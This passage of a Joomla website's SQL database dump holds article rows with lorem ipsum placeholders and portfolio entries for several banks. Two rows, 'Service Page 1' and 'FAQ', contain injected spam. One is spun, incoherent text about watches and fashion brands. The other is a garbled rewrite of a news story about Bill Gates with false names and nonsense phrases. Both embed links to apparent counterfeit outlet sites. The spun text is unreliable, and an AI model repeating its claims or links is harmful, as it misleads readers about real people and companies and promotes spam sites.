00:00:00','{\"image_intro\":\"images\\/pages\\/slider\\/img1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,4,'','',1,46,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(88,198,'HTML5 and CSS3','html5-and-css3','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',1,80,'2013-12-10 06:36:38',736,'','2013-12-10 06:37:34',462,0,'0000-00-00 00:00:00','2013-12-10 06:36:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/pages\\/slider\\/img2.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(89,199,'TwitterBootstrapped','twitterbootstrapped','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',1,80,'2013-12-10 06:36:38',736,'','2013-12-10 06:38:44',462,0,'0000-00-00 00:00:00','2013-12-10 06:36:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/pages\\/slider\\/img3.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,2,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(90,200,'TwitterBootstrapped (2)','twitterbootstrapped-2','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',-2,80,'2013-12-10 06:36:38',736,'','2013-12-10 06:38:44',0,0,'0000-00-00 00:00:00','2013-12-10 06:36:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/pages\\/slider\\/img3.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(91,201,'Service Page 1','service-page-1','<p>Armani mens watch articles <br /><br />Armani mens watch articles <br /><br />Because the cost of purchasing quality materials, they are very pricey.With the usage quality watches, you won\'t only complement your outfit but also you will look really stylish and embellished.Australia has lots of watch dealers who supply the best watches produced by recognized manufacturers.Yet, the major problem in the matter of purchasing high.<br /><br />Sunglasses are and a fave of mine.Mall google deals an incredible.Secret fixation from calvin klein, armani code away due to giorgio armani, diesel\'s fragrance fuel for life infinite, benetton, forget sixty\'s skip, donna karan\'s dkny wonderful night, espirit with joy, estee lauder\'s parfum purely exotic.<br /><br />The top ten timex watches for men include the ironman shock solar 50 lap digital watch t5j641, t combination of racing black strap t2m552, gents alligator retrograde t2m422,.It has provided birth to the a lot of daring and vibrant iteration of michael kors watches that we get to see in the world today.It represents the flamboyant facet of this line and demonstrates that there is constantly new things to seem forward to.<br /><br />There are people who are so aware about their fashion that they tend to go for distinct brand names, shapes and kinds of vogue jam kw.A single java want a.<br /><br />Michael kors is a united states stylist and presently lives in new york urban <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> area.Michael kors bag brand has risen in appeal very fast throughout the last twelve month.Michael kors line aspects.No marvel michael kors goes to optimum of every lady\'s list as a fashion favorite.<br /><br />Skinny organizations are most picked now many with on <b><a title=\"Pandora Bracelets Canada\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Pandora Bracelets Canada</a></b> account of the slim match, white leading and thin the\"Mad adult adult males\"Fad that has actually overrun those who fashion company.If you do not intend to spent money on a trend that could perhaps not last after that this is the exc.<br /><br /></p>','',1,79,'2013-12-10 08:19:04',736,'','2015-06-15 07:36:00',736,736,'2015-06-18 03:12:17','2013-12-10 08:19:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',57,6,'','',1,465,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(92,202,'Pricing Table','pricing-table','lorem ipsum','',1,79,'2013-12-11 05:53:00',736,'','0000-00-00 00:00:00',0,736,'2015-06-18 03:12:14','2013-12-11 05:53:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,4,'','',1,150,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(93,204,'FAQ','faq','<p>Bill gates is hoping do the steve jobs <br /><br />Bill gates joins a long line of entrepreneurs, from ken jobs at apple inc.To eric dell at dell inc, who threw their companies into trying to fix what they created.<br /><br />Gates will stay with you while new microsoft corp.Ceo satya nadella restructures the company.Having moved aside as chairman after 33 years, gates will be a director and work part time as nadella\'s machinery adviser.<br /><br />The hope is that the co founder of earth\'s largest software maker will help it recapture the innovation and invention that set it on its way in 1975.<br /><br />Yet for each and every jobs who returns to apple and invents an iphone, there\'s a case of somebody who should have left his corporate creation alone.<br /><br />Richard schulze troublesome best buy co.\'s revitalisation efforts with a takeover attempt last year.Chip wilson\'s kept as lululemon athletica inc.Chairman impeded alien life aceoas sales growth slowed.Mike lazaridis and his cell phone ltd.Co founder explored buying the having trouble keeping up smartphone maker after he was ousted asceo.Even dating back the early 1900s, billy durant made such a hash of things after he built universal motors co.That they was forced out twice. \"The problem comes if the source of the original success isn\'t what\'s needed to be happy in the future and they can\'t make that change, <br /><br />Jerry yang\'s training at yahoo!Corporation.Is an illustration of this what can happen when a founder confronts a landscape that\'s altered more than he realizes, davis being spoken.Yang started yahoo with david filo in 1995 and watched it grow from a member of family distance as its business manager.He becameceoin 2007 after the company lost its lead in world wide web advertising to google inc.He said he was prepared to fight it out in the future.<br /><br />Two long periods of time later, the stock had lost 60 percent of its value and he\'d quit being forced for spurning a $47.5 billion takeover bid from Microsoft and failing to broker an internet marketing deal with Google.<br /><br />In the early stages,\"He built a great site, davis referred to. \"When he went back, he was not able to figure out what to do next.Facts change.Ibm used to make laptops.Ge were an appliance company, <br /><br />When entrance left theceojob in 2000, microsoft safe 93 percent of consumer computing devices, which at this time were mostly pcs.The particular business had less than 20 percent 12 years later after the market swelled to include smartphones and tablets most not running on microsoft software.<br /><br />A major critique of gates is that he missed the mobile trend.He was part of the management group that developed small screen devices long before apple, and failed to give.The iphone were released in 2007, when he was windows chief software architect.<br /><br />Relatedbill gates to play key role in service at microsoft even if he loses board chairmicrosoft corp names insider satya nadella as next ceo, john thompson to change bill gates as chairman <br /><br />The 58 year old co founder has also been out <b><a title=\"Ralph Lauren Outlet UK\" href=\"http://www.locosounds.co.uk\">Ralph Lauren Outlet UK</a></b> of the day to day game for a long period.He\'s said his philanthropic work will occupy the majority of his time.<br /><br />Really, gates is the programmer who saw the need for a unified computer itself for the fledgling pc in 1981, and microsoft\'s successful efforts to use its monopoly with windows to win the web browser war of the late 1990s almost led to a goverment ordered breakup.Microsoft continues money software than any other company.<br /><br />Gateways and jobs, have been rivals and friends, took different comes near.Gates achieved his initial goal to put a pc on every desk and in every den with a structure that established windows and office as indispensable to companies and the only choice for most individuals.Jobs was more of a builder, famously attentive to the particular design details to make products good looking and easy to use.For example gates, jobs didn\'t devote long to non business pursuits, remaining focused on apple until a couple of <b><a title=\"locosounds\" href=\"http://www.locosounds.co.uk\">locosounds</a></b> months before he died.<br /><br />Jobs returned to an additional in 1997 after a 12 year absence as it struggled for survival, and with the devices invented during his second reign it became the world\'s most effective technology concern.He oversaw the creation of the ipod, the iphone as well as the ipad, changing the landscape of the way people communicate, take notice of music, watch free movies and conduct business.<br /><br />Some founders never leave and write testimonials.And ralph lauren continues to set outfits at his namesake company after 40 years.Dell is spinning his, after he and a financial partner took an additional private last year and he accelerated a plan to retool the pc maker into a supplier of the hardware, software and services a good agent to run data centers.It was under his watch that earth\'s largest coffee shop chain introduced the via packets of instant coffee, now a major driver of abroad growth.Schultz, who has predicted via has to be a billion dollar brand, just handed over day to day operations to his chief financial officer to focus on what he calls\"Next epoch retailing, <br /><br />If gates comes up with a via for ms, nobody will be protesting and complaining about him overstaying his welcome, referred to elaine eisenman, dean of executive and internet business education at babson college in wellesley, boston, and a director at shoe hold dsw inc.<br /><br />The smart coming back to founder\"Comes back with sort of a serial business owner mindset rather than a \'i am here to continue the tradition and the legacy\' mindset, she these. \"That\'s style what schultz did with via, <br /><br /></p>','',1,79,'2013-12-15 09:19:35',736,'','2015-06-18 03:13:25',736,736,'2015-06-18 03:13:25','2013-12-15 09:19:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,2,'','',1,379,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(94,206,'Portfolio Page','portfolio-page','<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged</p>','',1,79,'2013-12-18 08:52:43',736,'','2014-04-11 10:46:59',462,0,'0000-00-00 00:00:00','2013-12-18 08:52:43','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,8,'','',1,57,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(95,207,'national bank of abu dhabi','html5-and-css3','<p>national bank of abu dhabi</p>','',1,84,'2013-12-18 09:31:34',736,'','2015-03-15 07:55:23',736,0,'0000-00-00 00:00:00','2013-12-18 09:31:34','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/AbuDabiAlwatani.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/AbuDabiAlwatani.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,14,'','',1,662,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(96,208,'Cross Browser','cross-browser','<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged</p>','',1,85,'2013-12-18 09:34:35',736,'','2014-04-16 06:56:46',462,0,'0000-00-00 00:00:00','2013-12-18 09:34:35','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/img2.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/img2.jpg\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,6,'','',1,31,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(97,209,'LESS based','less-based','<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged</p>','',1,85,'2013-12-18 09:35:12',736,'','2014-04-16 06:56:24',462,0,'0000-00-00 00:00:00','2013-12-18 09:35:12','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/img3.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/img3.jpg\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,5,'','',1,116,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(98,210,'Al Ramz','lazy-loader','<p>Ramz</p>','',1,84,'2013-12-18 09:35:50',736,'','2015-03-15 07:53:42',736,0,'0000-00-00 00:00:00','2013-12-18 09:35:50','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/Ramz.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/Ramz.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,13,'','',1,630,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(99,211,'MSM','easy-customization','<p>muscat security market</p>','',1,82,'2013-12-18 09:36:46',736,'','2015-03-15 07:47:03',736,0,'0000-00-00 00:00:00','2013-12-18 09:36:46','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/msm.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/msm.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,3,'','',1,853,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(100,212,'OAB','offcanvas-menu','<p>OMAN ARAB BANK</p>','',1,82,'2013-12-18 09:37:42',736,'','2015-03-15 07:43:48',736,0,'0000-00-00 00:00:00','2013-12-18 09:37:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/OAB.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/OAB.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,2,'','',1,726,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(101,213,'Portfolio 1 (7)','portfolio-7','<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged</p>','',-2,82,'2013-12-18 09:31:34',736,'','2013-12-18 09:33:40',462,0,'0000-00-00 00:00:00','2013-12-18 09:31:34','0000-00-00 